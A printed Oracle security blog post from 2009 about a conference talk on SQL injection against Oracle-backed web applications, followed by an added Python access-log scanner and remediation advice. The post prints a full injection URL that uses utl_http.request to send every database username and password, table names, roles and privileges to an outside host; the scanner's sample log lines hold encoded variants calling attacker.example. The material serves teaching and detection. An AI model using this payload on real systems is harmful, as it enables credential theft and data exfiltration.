- Alexander Kornbrust Oracle Security Blog - http://blog.red-database-security.com -

IT Underground Prague - Presentation

This entry was posted by Alexander Kornbrust on 27 Mar 2009 @ 22:51 in SQL Injection, General | 1 comment

Just back from the [1] IT Underground 2009 in Prague.

I met several smart security consultants and some of my customers from different countries in Europe (Belgium, Poland, Germany, UK, …) and had a lot of interesting talks.

I gave a presentation concerning [2] SQL Injection in web applications with Oracle backend databases.

Here is a short example from the presentation:

The following (vulnerable) URL sends all usernames/passwords, all accessible tables, table and column names, roles and privileges to a remote system in a single SQL statement. This works with a simple trick: wrap the outbound request in sum(length(utl_http.request(...))), so that every row of each subquery is sent as an HTTP request while the whole expression still evaluates to one number that fits into the injected comparison.

http://victim.com/order.jsp?id=17' or 1=((select sum(length(utl_http.request('http://www.orasploit.com/'username||'='||password) from dba_users)))+((select sum(length(utl_http.request('http://www.orasploit.com/'owner||'='||table_name) from dba_tables)))+((select sum(length(utl_http.request('http://www.orasploit.com/'owner||'='||table_name||'='||column_name)) from dba_users))+((select sum(length(utl_http.request('http://www.orasploit.com/'grantee||'='||granted_role) from dba_role_privs)))+((select sum(length(utl_http.request('http://www.orasploit.com/'grantee||'='||owner||'='||table_name||'='||privilege||'='||grantable) from dba_tab_privs)))--
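The injection above is only noisy on the database side; on the web tier it is one GET request whose parameter contains an Oracle out-of-band primitive. The following detector is an added example, not code from the post or the presentation: it parses web server access-log lines, URL-decodes each query parameter (including double-encoded values), strips inline comments and whitespace, and flags any value that references a package that can push data to an external host. The primitive list, the log format, the host name attacker.example and the sample log lines are all constructed for this example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Oracle functions that let a single SELECT send data to a remote host,
# as the post shows with utl_http.request(). This list is an assumption
# for the example; extend it to match your own environment.
OOB_PRIMITIVES = (
    "utl_http.request",
    "utl_inaddr.get_host_address",
    "httpuritype",
    "dbms_ldap.init",
)

# Combined/common log format: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)

# Constructed sample log lines (not from the post). The second line carries a
# URL-encoded variant of the post's payload; the third is double-encoded and
# splits the package name with an inline comment (utl_/**/http).
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Mar/2009:22:51:00 +0100] "GET /order.jsp?id=17 HTTP/1.1" 200 512',
    '10.0.0.9 - - [27/Mar/2009:22:52:10 +0100] "GET /order.jsp?id=17%27%20or%201%3D((select%20sum(length(UTL_HTTP.REQUEST(%27http%3A%2F%2Fattacker.example%2F%27%7C%7Cusername)))%20from%20dba_users))-- HTTP/1.1" 500 214',
    '10.0.0.9 - - [27/Mar/2009:22:53:01 +0100] "GET /order.jsp?id=17%2527%20or%201%3D1%20and%20utl_%2F**%2Fhttp.request(%27x%27)%3D%27y%27-- HTTP/1.1" 500 214',
    '10.0.0.7 - - [27/Mar/2009:22:54:00 +0100] "POST /login.jsp HTTP/1.1" 302 0',
]


def normalize(value):
    """Decode twice (catches double encoding), lower-case, drop /* */ comments
    and all whitespace so that 'UTL_HTTP . REQUEST' or 'utl_/**/http' match."""
    v = unquote_plus(unquote_plus(value)).lower()
    v = re.sub(r"/\*.*?\*/", "", v)
    v = re.sub(r"\s+", "", v)
    return v


def find_oob_primitives(target):
    """Return [(parameter, primitive)] for every query parameter of a request
    target that references one of the out-of-band primitives."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        norm = normalize(value)
        for prim in OOB_PRIMITIVES:
            if prim in norm:
                hits.append((name, prim))
    return hits


def scan_access_log(lines):
    """Parse each log line and return one alert per request that carries an
    out-of-band primitive; lines that do not match the format are skipped."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = find_oob_primitives(m.group("target"))
        if hits:
            alerts.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "path": urlsplit(m.group("target")).path,
                "status": int(m.group("status")),
                "hits": hits,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(alert)
```

Run against the constructed log, the scanner reports the two requests from 10.0.0.9 and nothing for the benign ones. Such a detector is a signal, not the fix: the application itself must use bind variables (a PreparedStatement in order.jsp instead of string concatenation), and EXECUTE on UTL_HTTP should not be granted to PUBLIC, so that a low-privileged application account cannot open outbound connections from the database at all.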

More details are in the [3] presentation.


This article was printed from Alexander Kornbrust Oracle Security Blog: http://blog.red-database-security.com

URL of the article: http://blog.red-database-security.com/2009/03/27/it-underground-prague-presentation/

URLs in this post:
[1] IT Underground: http://www.itunderground.org
[2] SQL Injection in web applications with Oracle backend databases: http://www.red-database-security.com/wp/oracle_sql_injection_2009.pdf
[3] presentation: http://www.red-database-security.com/wp/oracle_sql_injection_2009.pdf